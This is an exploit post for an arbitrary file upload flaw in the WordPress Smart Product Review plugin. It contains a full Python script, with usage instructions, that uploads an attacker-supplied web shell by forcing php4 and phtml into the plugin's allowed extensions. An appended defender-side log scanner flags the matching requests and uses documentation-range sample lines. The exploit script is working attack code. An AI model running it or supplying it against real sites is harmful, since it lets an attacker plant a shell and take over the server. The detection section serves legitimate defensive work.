WordPress plugin smart product review 1.0.4 - upload of any file
2022-06-23 22:13:00 【Khan security team】
Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
Version: <= 1.0.4
Tested on: Kali Linux
```python
import os.path
from os import path
import json
import requests
import time
import sys


def banner():
    animation = "|/-\\"
    for i in range(20):
        time.sleep(0.1)
        sys.stdout.write("\r" + animation[i % len(animation)])
        sys.stdout.flush()
        # do something
    print("Smart Product Review 1.0.4 - Arbitrary File Upload")
    print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")


def usage():
    print("Usage: python3 exploit.py [target url] [your shell]")
    print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")


def vuln_check(uri):
    response = requests.get(uri)
    raw = response.text

    if ("No script kiddies please!!" in raw):
        return False
    else:
        return True


def main():
    banner()
    if (len(sys.argv) != 3):
        usage()
        sys.exit(1)

    base = sys.argv[1]
    file_path = sys.argv[2]

    ajax_action = 'sprw_file_upload_action'
    admin = '/wp-admin/admin-ajax.php'

    uri = base + admin + '?action=' + ajax_action
    check = vuln_check(uri)

    if (check == False):
        print("(*) Target not vulnerable!")
        sys.exit(1)

    if (path.isfile(file_path) == False):
        print("(*) Invalid file!")
        sys.exit(1)

    files = {'files[]': open(file_path)}
    data = {
        "allowedExtensions[0]": "jpg",
        "allowedExtensions[1]": "php4",
        "allowedExtensions[2]": "phtml",
        "allowedExtensions[3]": "png",
        "qqfile": "files",
        "element_id": "6837",
        "sizeLimit": "12000000",
        "file_uploader_nonce": "2b102311b7"
    }
    print("Uploading Shell...")
    response = requests.post(uri, files=files, data=data)
    file_name = path.basename(file_path)
    if ("ok" in response.text):
        print("Shell Uploaded!")
        print("Shell URL on your Review/Comment")
    else:
        print("Shell Upload Failed")
        sys.exit(1)


main()
```
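A defender-side check for the request pattern this script produces, added here as an example (it is not part of the original post or of the plugin): it scans web-server access logs for calls to the `sprw_file_upload_action` AJAX action and for later successful requests to `.php4`/`.phtml` files. The combined log format, the sample lines, and the upload path shown in them are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed input: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
UPLOAD_ACTION = "sprw_file_upload_action"   # AJAX action named in the script above
SCRIPT_EXTS = (".php4", ".phtml")           # extensions the script asks the plugin to accept


def scan(lines):
    """Return findings as (kind, ip, timestamp, target) tuples, in log order."""
    findings, posters = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        url = urlsplit(m["target"])
        path = url.path.lower()
        action = parse_qs(url.query).get("action", [])
        if path.endswith("/wp-admin/admin-ajax.php") and UPLOAD_ACTION in action:
            kind = "upload_post" if m["method"] == "POST" else "upload_probe"
            if kind == "upload_post" and m["status"] == "200":
                posters.add(m["ip"])  # remember clients whose upload call succeeded
            findings.append((kind, m["ip"], m["ts"], m["target"]))
        elif path.endswith(SCRIPT_EXTS) and m["status"] == "200":
            # A served .php4/.phtml file is suspicious alone, more so after an upload POST.
            kind = "script_hit_after_upload" if m["ip"] in posters else "script_hit"
            findings.append((kind, m["ip"], m["ts"], m["target"]))
    return findings


# Constructed sample lines (documentation IP ranges, placeholder upload path).
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Jun/2022:22:10:01 +0000] "GET /wp-admin/admin-ajax.php?action=sprw_file_upload_action HTTP/1.1" 200 2 "-" "python-requests/2.27.1"',
    '203.0.113.7 - - [23/Jun/2022:22:10:02 +0000] "POST /wp-admin/admin-ajax.php?action=sprw_file_upload_action HTTP/1.1" 200 64 "-" "python-requests/2.27.1"',
    '198.51.100.4 - - [23/Jun/2022:22:10:05 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Jun/2022:22:10:09 +0000] "GET /wp-content/uploads/EXAMPLE/file.phtml HTTP/1.1" 200 15 "-" "python-requests/2.27.1"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

Any `upload_post` finding from a client with no authenticated session, or any `script_hit` under a media directory, is worth triaging against the files actually present on disk.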